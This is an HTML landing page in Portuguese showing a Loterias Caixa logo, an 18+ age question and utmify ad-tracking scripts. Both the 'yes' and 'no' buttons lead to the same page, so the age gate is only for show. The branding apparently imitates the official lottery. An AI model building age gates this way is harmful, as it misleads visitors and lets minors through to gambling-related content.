<!doctype html>
<html lang="pt-br">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title></title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&display=swap" rel="stylesheet">
    <script src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
    ></script>
    <script>
        window.pixelId = "675c826bfe3c5b3055ee8bfd";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
    </script>
  </head>
  <style>
    @font-face {
        font-family: 'Futura-Book';
        src: url('../font/Futura-Book.eot');
        src: url('../font/Futura-Book.eot?#iefix') format('embedded-opentype'),
            url('../font/Futura-Book.woff2') format('woff2'),
            url('../font/Futura-Book.woff') format('woff'),
            url('../font/Futura-Book.ttf') format('truetype'),
            url('../font/Futura-Book.svg#Futura-Book') format('svg');
        font-weight: normal;
        font-style: normal;
        font-display: swap;
    }

    body {
        font-family: 'Futura-Book' !important;
        background: linear-gradient(45deg, #00a9ad, #005ca9); 
        background-size: 100%;
        background-repeat: no-repeat;
        height: 100vh !important;
        overflow: hidden !important;
    }

    .container-principal {
        height: 100vh;
    }

    .container-principal img {
        width: 100px;
    }

    .container-principal h1 {
        color: white;
        font-size: 1.5rem;
        margin-top: 3rem;
    }

    .botoes {
        margin-top: .5rem;
    }

    .botoes a {
        width: 8rem;
        margin: 0rem .7rem;
    }

    .botoes button {
        background-color: #f39200;
        color: white;
        font-weight: 500;
        width: 100%;
        border: none;
        padding: .5rem .5rem .2rem .5rem;
        font-size: 1.2rem;
        border-radius: .4rem;
    }

    .botoes button:hover {
        background-color: #173e68;
        color: white;
    }

    button.btn-nao {
        background-color: white;
        color: #173e68;
    }

    
  </style>
  <body>

    <div class="container-principal d-flex justify-content-center align-items-center flex-column">
        <img src="../img/loterias-caixa-logo.webp" alt="">
        <h1>Você tem mais de 18 anos?</h1>
        <div class="botoes w-100 d-flex justify-content-center align-items-center">
            <a href="/1"><button>SIM</button></a>
            <a href="/1"><button class="btn-nao">NÃO</button></a>
        </div>
    </div>


    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-kenU1KFdBIe4zVF0s0G1M5b4hcpxyD9F7jL+jjXkk+Q2h455rYXK/7HAuoJl+0I4" crossorigin="anonymous"></script>
  </body>
</html>